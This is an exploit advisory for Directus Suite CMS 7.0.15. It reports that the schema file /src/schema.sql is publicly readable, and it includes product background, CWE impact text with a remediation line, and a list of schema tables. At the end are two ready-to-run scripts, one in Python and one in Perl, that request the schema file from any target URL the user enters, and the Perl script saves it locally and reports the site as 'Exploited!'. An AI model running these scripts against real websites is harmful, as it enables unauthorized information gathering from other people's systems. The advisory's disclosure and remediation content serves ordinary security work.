###########################################################################

# Exploit Title : Directus Suite CMS 7.0.15 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : directus.io
# Software Download Link : github.com/directus/directus/archive/master.zip
# Software Information Link : docs.directus.io/guides/database.html#directus-schema
github.com/directus/directus
# Software Version : 7 - 7.0.9 - 7.0.15
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about => MySQL database dump
acunetix.com/vulnerabilities/web/mysql-database-dump/

###########################################################################

# Description about Software :
***************************
Directus 7 Suite — Future-Proof Headless CMS & API for Custom Databases.

Directus is an open-source suite of software that provides an instant API wrapper for SQL databases 

and an intuitive Admin App for non-technical users to manage that content. It's like a safe, friendly, and 

super-powered "database client" (eg: PHP-my-Admin or Sequel Pro).

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* A database dump contains a record of the table structure and/or the data from a database 

and is usually in the form of a list of SQL statements. A database dump is most often used for 

backing up a database so that its contents can be restored in the event of data loss. 

This file contains a MySQL database dump. This information is highly sensitive 

and should not be found on a production system.

* Remediation - Restrict access to this file or remove it from the system.

Information :
************
Database-First => 

Directus follows a database-first approach, storing all of your data unaltered 
in pure SQL databases with that can be completely customized.

Access and Optimization =>

Directus mirrors your actual database so it will automatically stay in sync with 
any changes made directly to the database! With the full power of SQL unlocked, you can:
Architect your actual database with meaningful table and column names
Infinitely optimize with indexing, datatypes, lengths, defaults, keys, encoding, etc
Update your database schema at any point and Directus will instantly reflect changes
Create, update, and delete content directly from the database

Direct Access => 

This database-first approach means that you have the option to completely bypass 
Directus if needed. Connecting your application directly to the database means Directus is completed.

Creating a Database

# MySQL
Connect to MySQL:

$ mysql -h <host> -u <user> -p

The command above will ask you for the user password:

$ mysql -h localhost -u root -p
Enter password: ****

After you successfully log into MySQL, run the CREATE DATABASE command:

mysql> CREATE DATABASE directus;
Query OK, 1 row affected (0.00 sec)
# Directus Schema

This document provides an explanation of all tables and fields within the Directus schema boilerplate.

Name  Description
directus_activity  Log of all actions (eg: item updates) performed through the API (or App)
directus_activity_read  Tracks if a user has seen an Activity/Message item
directus_collection_presets  User's collection preferences and bookmarks for Item Listing page
directus_collections  Information for database tables (collections) managed by Directus
directus_fields  Information for database columns (fields) and their interfaces
directus_files  Metadata for all files and embeds added to Directus
directus_folders  Nestable virtual directories used to organize Directus files
directus_migrations  Database schema changes for upgrades/downgrades created by Phinx
directus_permissions  Defines specific API access rules for a specific Role
directus_relations  Keys and junctions for field-level relationships between collections
directus_revisions  The delta and full data snapshot for all item Activity (eg: updates)
directus_roles  Listing of user roles that group together sets of permissions
directus_settings  Ad-hoc key-value-pairs for storing Global and Extension settings
directus_user_roles  Junction table allowing users to possess multiple roles
directus_users  Directory of all App and API Users

###########################################################################

File :
*****
/directus/src/schema.sql

/src/schema.sql

/schema.sql

Information :
************
# Sequel Pro SQL dump
# Version 4541
# Host: localhost (MySQL 5.6.38)
# Database: directus

# Dump of table directus_activity

# Dump of table directus_activity_seen

# Dump of table directus_collection_presets

# Dump of table directus_collections

# Dump of table directus_fields

# Dump of table directus_files

# Dump of table directus_folders

# Dump of table directus_migrations

# Dump of table directus_permissions

# Dump of table directus_relations

# Dump of table directus_revisions

# Dump of table directus_roles

# Dump of table directus_settings

# Dump of table directus_user_roles

# Dump of table directus_users

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/src/schema.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Directus Suite CMS 7.0.15 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="src/schema.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/src/schema.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/src/schema.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################